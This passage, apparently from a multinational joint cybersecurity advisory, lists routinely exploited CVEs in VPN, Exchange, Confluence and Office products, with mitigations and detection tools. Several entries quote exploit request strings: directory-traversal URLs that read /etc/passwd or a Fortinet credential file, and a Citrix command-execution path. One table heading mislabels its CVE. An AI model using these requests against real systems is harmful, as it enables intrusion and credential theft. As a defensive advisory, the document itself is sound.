CVE-2020-5902.[[14](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[15](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)][[16](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)][[17](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)]\n\n### 2021 CVEs\n\nIn 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. \n\n * **Microsoft Exchange: **CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 \n * See CISA\u2019s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.\n * **Pulse Secure:** CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900 \n * See CISA\u2019s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.\n * **Accellion:** CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 \n * See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.\n * **VMware:** CVE-2021-21985 \n * See CISA\u2019s Current Activity: Unpatched VMware vCenter Software for more information and guidance. \n * **Fortinet:** CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 \n * See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. \n\n### Mitigations and Indicators of Compromise\n\nOne of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. \n\nFocusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries\u2019 operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in the Atlassian Crow, a centralized identity management and application (CVE-2019-11580) in its reported operations. A concerted focus on patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. \n\nAdditionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n\nTables 2\u201314 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. \n\n**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE. \n\n\n_Table 2: CVE-2019-19781 Vulnerability Details_\n\n**Citrix Netscaler Directory Traversal (CVE-2019-19781)** \n \n--- \n \n_**Vulnerability Description**_ \nCitrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. \n\n| \n\n_**CVSS 3.02**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g.,` curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS. \n\n_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n**_Recommended Mitigations_**\n\n * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781\n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). \n \n_**Detection Methods**_\n\n * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.\n * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).\n * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).\n * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n**_Vulnerable Technologies and Versions_** \nCitrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 \n \n_**References and Additional Guidance**_\n\n * [Citrix Blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n * [National Institute for Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)\n * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA FOR CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders ](<https://www.ic3.gov/Media/News/2021/210426.pdf>)\n * [DoJ: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)\n * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_Table 3: CVE 2019-11510 Vulnerability Details_\n\nPulse Secure Connect VPN (CVE 2019-11510) \n--- \n \n_**Vulnerability Description**_ \nPulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials. \n\n| \n\n**CVSS 3.0**\n\nCritical \n \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nImproper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This could lead to anyone connecting to the VPN as a potential target to compromise. \n\n_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n \n_**Recommended Mitigations**_\n\n * Upgrade to the latest Pulse Secure VPN.\n * Stay alert to any scheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read local system files. \n**_Detection Methods_**\n\n * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.\n * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708. \n \n_**Vulnerable Technologies and Versions**_ \nPulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n * [Pulse Security Advisory: SA44101 \u2013 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)\n * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)\n * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [DoJ Press Release: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>) \n \n_Table 4: CVE 2018-13379 Vulnerability Details_\n\n**Fortinet FortioOS Secure Socket Layer VPN (CVE 2018-13379)** \n--- \n \n**_Vulnerability Description_** \nFortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to exact clear-text usernames and passwords. \n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n \n**_Vulnerability Discussion, IOCs, and Malware Campaigns_** \nWeakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform a `HTTP GET request http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results the server responding with unprintable/hex characters alongside cleartext credential information. \n\n_Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo). _\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n \n \n**_Recommended Mitigations_**\n\n * Upgrade to the latest Fortinet SSL VPN. \n * Monitor for alerts to any unscheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read the `sslvpn_websessions` file. \n**_Detection Methods_**\n\n * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709. \n \n**_Vulnerable Technologies and Versions_** \nFortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable. \n \n_**References**_\n\n * [FortiOS System File Leak Through SSL VPN via Specialty Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [Github: Fortinet Ssl Vpn Cve-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)\n * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\n * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) \n \n_Table 5: CVE-2020-5902 Vulnerability Details_\n\nF5 Big IP Traffic Management User Interface (CVE-2020-5902) \n--- \n \n_**Vulnerability Description**_ \nThe Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. \n\n| \n\n_**CVSS 3.0**_ \nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nThis vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. \n\n| _**Fix**_ \n[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>) \n \n \n_**Recommended Mitigations**_ \nDownload and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.\n\n * Address unauthenticated and authenticated attackers on self IPs by blocking all access.\n * Address unauthenticated attackers on management interface by restricting access. \n**_Detection Methods_**\n\n * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>). \n * Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_ \nBIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable. \n \n**_References_**\n\n * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>) \n \n_Table 6: CVE-2020-15505 Vulnerability Details_\n\nMobileIron Core &amp; Connector (CVE-2020-15505) \n--- \n \n_**Vulnerability Description**_\n\nMobileIron Core &amp; Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nCVE-2020-15505 is an RCE vulnerability in MobileIron Core &amp; Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\nMultiple APTs have been observed exploiting this vulnerability to gain unauthorized access.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * None. Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\nMobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable. \n \n_**References**_\n\n * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)\n * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) \n \n_Table 7: CVE-2020-0688 Vulnerability Details_\n\nMicrosoft Exchange Memory Corruption (CVE-2020-0688) \n--- \n \n_**Vulnerability Description**_\n\nAn RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \nVulnerability Discussion, IOCs, and Malware Campaigns \nCVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install. \n\nA nation-state _APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF >) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n_**Vulnerable Technologies and Versions**_\n\nMicrosoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable. \n \n_**References**_\n\n * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)\n * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>) \n \n_Table 8: CVE-2019-3396 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.\n\n| \n\n_**CVSS**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nConfluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.\n\n_Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<Patch Available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor-approved resource. \n \n_**Detection Methods**_\n\n * Manually check the software version to see if it is susceptible to this vulnerability.\n\n * CVE-2019-3396 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at [https://github.com/nsacyber/Mitigating-Web-Shells.](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)\n * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)\n * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)\n * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)\n * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>) \n \n_Table 9: CVE 2017-11882 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nMicrosoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the \"Microsoft Office Memory Corruption Vulnerability.\" \n\nCyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nMicrosoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.\n\nData execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.\n\n_Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) \n \n_**Recommended Mitigations**_\n\n * To remediate this issue, administrators should deploy Microsoft\u2019s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.\n * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>). \n \n_**Detection Methods**_\n\n * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\n * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)\n * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)\n * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>) \n \n_Table 10: CVE 2019-11580 Vulnerability Details_\n\nAtlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAttackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_**Recommended Mitigations**_\n\n * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.\n * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.\n * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PD](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)F and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells> \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. \n \n**_References_**\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)\n * [Crowd CWD-5388: Crowd \u2013 pdkinstall Development Plugin Incorrectly Enabled \u2013 CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)\n * [Crowd Security Advisory: Crowd Data Center and Server 